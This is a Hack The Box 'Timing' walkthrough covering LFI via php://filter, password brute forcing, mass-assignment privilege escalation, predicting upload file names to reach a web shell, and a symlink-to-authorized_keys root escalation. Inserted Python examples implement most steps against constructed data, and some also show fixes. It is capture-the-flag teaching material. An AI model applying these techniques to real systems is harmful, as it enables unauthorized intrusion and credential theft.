Hackthebox – Timing Walkthrough

We first scan the box with nmap to find out which ports are open and which services are running on them.

-sC: run the default nmap scripts
-sV: detect service versions

We get back the following result, showing that two ports are open.

  • Port 22 is used for the SSH service
  • Port 80 is used for the HTTP service

We visit the main page. A login panel welcomes us.

Nothing interesting in the page source.

We try some default credentials, but they do not work.

We run an ffuf scan.

And get some results.

Let’s visit image.php

image.php gives us neither an error nor a redirect, just a blank white page. This looks suspicious; it probably expects a GET or POST parameter.

We must find the right parameter name. wfuzz will help us with this.

Oops, weird. Let's filter those out.

Cool! We get a parameter.

--hw 0 means: hide responses whose word count equals 0.

We are detected: the application answers our attempt with a detection message.

There is a blacklist, so let's try the php://filter wrapper with base64 encoding.

And it works.

Decode the base64.

We successfully dump /etc/passwd.

Filtering out the unnecessary entries (system accounts without a login shell).

Now we have a user named "aaron".
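The LFI step above, as an added example that is not part of the original walkthrough: it builds the php://filter payload, decodes the base64 blob the page returns, and filters /etc/passwd down to accounts with an interactive shell. The blacklist rule modelled here is an assumption (the page only shows that a bare /etc/passwd is detected while the wrapper gets through), the request parameter name is not reproduced, and the passwd contents and page body are constructed sample data.

```python
import base64
import re

# Shell basenames that mark an interactive account.
SHELLS = {"sh", "bash", "zsh", "dash", "fish", "ksh"}


def is_blocked(value):
    """Assumed model of the blacklist: reject absolute paths and '..' and
    nothing else. This is consistent with the page (bare /etc/passwd is
    detected, php://filter/... is not) but the real rules are not shown."""
    return value.startswith("/") or ".." in value


def filter_payload(path):
    """Wrap a target path in php://filter so include() emits its bytes
    base64-encoded instead of executing or rendering them."""
    return "php://filter/convert.base64-encode/resource=" + path


def decode_lfi_response(body):
    """Pull the base64 blob that include() printed out of the page and decode it."""
    match = re.search(r"[A-Za-z0-9+/]{16,}={0,2}", body)
    if match is None:
        raise ValueError("no base64 blob found in response")
    return base64.b64decode(match.group(0)).decode()


def login_users(passwd):
    """Keep only /etc/passwd accounts whose login shell is interactive."""
    users = []
    for line in passwd.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[6].rsplit("/", 1)[-1] in SHELLS:
            users.append(fields[0])
    return users


# Constructed sample data: a plausible /etc/passwd and the kind of page body
# image.php would wrap around the encoded file. Not captured from the box.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    "aaron:x:1000:1000:aaron:/home/aaron:/bin/bash\n"
)
SAMPLE_RESPONSE = (
    "<html><body>\n"
    + base64.b64encode(SAMPLE_PASSWD.encode()).decode()
    + "\n</body></html>"
)


def run():
    """Whole chain: bare path is blocked, wrapped path passes, response decodes."""
    target = "/etc/passwd"
    if not is_blocked(target):
        raise RuntimeError("model mismatch: bare path should be blocked")
    payload = filter_payload(target)
    if is_blocked(payload):
        raise RuntimeError("model mismatch: wrapper should pass")
    return login_users(decode_lfi_response(SAMPLE_RESPONSE))


if __name__ == "__main__":
    print("payload:", filter_payload("/etc/passwd"))
    print("users with a shell:", run())
```

The same wrapper is what lets us read PHP source later in the box: without the base64 filter, include() would execute the file instead of showing it.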

We find the password of user aaron by brute forcing the login with hydra.

Let’s login.

Nothing seems interesting, except that we are logged in as user 2. Who is user 1?

Let’s check the source code of profile.php

The data is sent to /profile_update.php

We get the source code of profile_update.php with the same php://filter trick.

The source shows that four parameters are required. It also updates the role field, which is not present in the form.

We submit an update of the personal info (the values do not matter), switch on FoxyProxy and send the request to Burp Suite.

Let’s add &role=1 to the POST body and forward the request.

OK. The profile was updated.

When we refresh the page we see an "Admin panel" entry in the menu bar.
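The mass-assignment bug behind the role change, as an added example that is not the page's own code and not the real profile_update.php: a model of the vulnerable update logic beside a hardened version, plus the attacker-side body tampering done in Burp. The four required field names are assumptions (the page says four parameters are required but does not list them); only "role" and the value 1 come from the page.

```python
from urllib.parse import parse_qs, urlencode

# Assumed names for the four mandatory form fields; the page does not list them.
REQUIRED_FIELDS = ("firstName", "lastName", "email", "company")
ROLE_USER, ROLE_ADMIN = 0, 1


def _parse_body(body):
    """URL-encoded POST body -> flat dict (first value per key)."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def _check_required(form):
    missing = [f for f in REQUIRED_FIELDS if f not in form]
    if missing:
        raise ValueError("missing parameters: " + ", ".join(missing))


def update_profile_vulnerable(user, form):
    """Models what the page describes: the four visible fields are mandatory,
    and role is ALSO copied from the request even though the HTML form never
    sends it. Anyone who adds role=1 becomes an admin."""
    _check_required(form)
    updated = dict(user)
    for field in REQUIRED_FIELDS:
        updated[field] = form[field]
    if "role" in form:                       # the bug: client-controlled privilege
        updated["role"] = int(form["role"])
    return updated


def update_profile_fixed(user, form):
    """Hardened: copy an explicit allow-list of editable fields only.
    role stays whatever the server stored; extra parameters are ignored."""
    _check_required(form)
    updated = dict(user)
    for field in REQUIRED_FIELDS:
        updated[field] = form[field]
    return updated


def tamper_body(body, **extra):
    """Attacker side: take the captured URL-encoded body and append the
    parameter the form never sent, e.g. tamper_body(b, role=1)."""
    params = _parse_body(body)
    params.update({k: str(v) for k, v in extra.items()})
    return urlencode(params)


# Constructed request and user record (placeholder values, not from the box).
ORIGINAL_BODY = "firstName=a&lastName=b&email=a%40example.com&company=c"
CURRENT_USER = {"id": 2, "role": ROLE_USER, "firstName": "", "lastName": "",
                "email": "", "company": ""}


def demo():
    """Returns (role after vulnerable update, role after fixed update)."""
    form = _parse_body(tamper_body(ORIGINAL_BODY, role=ROLE_ADMIN))
    return (update_profile_vulnerable(CURRENT_USER, form)["role"],
            update_profile_fixed(CURRENT_USER, form)["role"])


if __name__ == "__main__":
    print("tampered body:", tamper_body(ORIGINAL_BODY, role=ROLE_ADMIN))
    print("roles (vulnerable, fixed):", demo())
```

The fix is the allow-list: the server decides which fields a request may touch, and privilege fields are never among them.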

Time to check the source code of upload.php. There is a call to time(), which supplies a changing value. A variable $file_hash is defined, and the string '$file_hash' is concatenated with the time() value to build the stored file name. Note that '$file_hash' is interpreted as the literal string, not the variable's content, because it is written in single quotes rather than double quotes. So the only part of the name that changes is the timestamp, and a timestamp is easy to guess.

The dummy JPG file containing our injected payload is ready.

And the exploit code is ready.

We first run the exploit, then upload the pika17.jpg file. The results are saved in the muck.txt file.

We now have a list of specific file names. One of them is our pika17.jpg file; only the name differs, because of the naming scheme we saw in the upload.php source.

We use curl to fetch each candidate. One of them is the one we are looking for: our payload returns the output of the id command successfully.
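The file-name prediction behind the exploit, as an added example that is not the page's exploit script: it reproduces the naming scheme the page describes (the literal string '$file_hash' concatenated with the Unix timestamp from time()) and brute-forces every name the upload could have received in a small window around the upload. Whether the concatenation is md5-hashed and joined to the original name with "_" is an assumption about the parts of upload.php not quoted on the page; the probe against the server is stubbed so the code runs offline.

```python
import hashlib
import time


def upload_name(ts, original_name):
    """Stored name for an upload at Unix time `ts`. '$file_hash' is the literal
    string (single-quoted in PHP, so the variable is NOT interpolated), joined
    to time(). md5 and the '_original' suffix are assumptions."""
    digest = hashlib.md5(("$file_hash" + str(ts)).encode()).hexdigest()
    return digest + "_" + original_name


def candidate_names(start_ts, end_ts, original_name):
    """Every name the upload could have received in [start_ts, end_ts]."""
    return [upload_name(t, original_name) for t in range(start_ts, end_ts + 1)]


def find_uploaded_file(start_ts, end_ts, original_name, exists):
    """Probe candidates oldest-first. `exists` is a callable(name) -> bool; in
    practice an HTTP request against the upload directory (the page uses
    curl), here a stub so the example is self-contained."""
    for name in candidate_names(start_ts, end_ts, original_name):
        if exists(name):
            return name
    return None


def upload_window(upload_fn, slack=2):
    """Read the clock just before and after the upload and widen the range by
    `slack` seconds to absorb clock skew between attacker and server."""
    before = int(time.time())
    upload_fn()
    after = int(time.time())
    return before - slack, after + slack


# Constructed stand-in for the server: it stored pika17.jpg at this instant.
SERVER_UPLOAD_TS = 1700000000
STORED_NAME = upload_name(SERVER_UPLOAD_TS, "pika17.jpg")


def demo():
    """Brute-force a +/-3 s window against the constructed server."""
    def server_has(name):
        return name == STORED_NAME
    start, end = SERVER_UPLOAD_TS - 3, SERVER_UPLOAD_TS + 3
    return find_uploaded_file(start, end, "pika17.jpg", server_has)


if __name__ == "__main__":
    print("stored as:", STORED_NAME)
    print("recovered:", demo())
```

The lesson for the defender is the single quote: a file name that was meant to include a random $file_hash actually contains a constant, so the entropy of the name collapses to the second of the upload.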

We try it on the browser.

Unfortunately we are unable to get a reverse shell at this stage, so we enumerate the box manually through the web shell.

After some directory enumeration we see a backup file in the /opt directory. How can we investigate this file? We can download it if we copy it into the /var/www/html directory.

We copy it to /var/www/html.

Cool! After navigating to the corresponding URL we are able to download the file.

Let’s unzip it.

At first glance, the .git directory catches the eye, right?

We will be using gitdumper.sh script.

This is a tool for downloading .git repositories from web servers that do not have directory listing enabled.

https://github.com/internetwache/GitTools/blob/master/Dumper/gitdumper.sh

We start a web server locally.

We run the script.

Hmm, some deleted files. It looks ordinary, but it is always worth searching around.

Voila. We find something useful: credentials.

We go with the credentials from the deleted file and log in as user aaron successfully.

Perfect. We get our first flag.

We see that user aaron can execute netutils with root permissions.

Let's run it to see what it does.

What if it is a tool that lets us download our own files onto the box?

Let’s test first.

We downloaded the test file.

Yes! It worked.

Let's go straight for root. We will make our SSH public key downloadable and fetch it onto the box with netutils. Before that, we create a symlink named pub_key pointing to /root/.ssh/authorized_keys, so that when netutils (running as root) writes the downloaded file pub_key, our public key lands in authorized_keys directly.

We create the symlink as described.

And our public key is ready to be downloaded.

Let's run netutils and download the public key.

Perfect! We are able to log in as root right after.
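The symlink trick used above, as an added example that is not the page's own commands and not netutils: a downloader that writes to whatever name it was given (the behaviour the page exploits) beside a hardened one that refuses to write through a link, run against a throwaway directory layout so nothing touches the real /root. The directory names and the public key are constructed.

```python
import os
import tempfile

# Constructed key material for the demo, not a real key.
PUBKEY = b"ssh-ed25519 AAAAC3constructedexamplekey attacker@example\n"


def careless_download(dest, content):
    """Models the downloader behaviour the page relies on: write to the
    requested name and follow it if it is a symlink."""
    with open(dest, "wb") as f:
        f.write(content)


def hardened_download(dest, content):
    """Refuse to write through a symlink: lstat check first, then open with
    O_NOFOLLOW so a link planted between the check and the open still fails."""
    if os.path.islink(dest):
        raise PermissionError("refusing to write through symlink: " + dest)
    flags = os.O_WRONLY | os.O_CREAT | os.O_TRUNC | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(dest, flags, 0o644)
    with os.fdopen(fd, "wb") as f:
        f.write(content)


def plant_symlink(home, target):
    """Unprivileged step: pub_key in our home directory is a link to root's
    authorized_keys, exactly as in the walkthrough."""
    link = os.path.join(home, "pub_key")
    os.symlink(target, link)
    return link


def run_attack(download):
    """Build a fake /root/.ssh and /home/aaron under a temp dir, plant the
    link, run `download` as root would, and return what ended up in
    authorized_keys (b'' if the file was never written)."""
    with tempfile.TemporaryDirectory() as tmp:
        root_ssh = os.path.join(tmp, "root", ".ssh")
        home = os.path.join(tmp, "home", "aaron")
        os.makedirs(root_ssh)
        os.makedirs(home)
        target = os.path.join(root_ssh, "authorized_keys")
        link = plant_symlink(home, target)
        try:
            download(link, PUBKEY)
        except OSError:
            pass  # the hardened downloader refuses; O_NOFOLLOW raises ELOOP
        if not os.path.exists(target):
            return b""
        with open(target, "rb") as f:
            return f.read()


if __name__ == "__main__":
    print("careless:", run_attack(careless_download))
    print("hardened:", run_attack(hardened_download))
```

Two practical caveats: the link must exist before the download runs, and the write truncates the target, so any keys already in /root/.ssh/authorized_keys are clobbered.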

And get the root flag successfully.

Thank you for your time.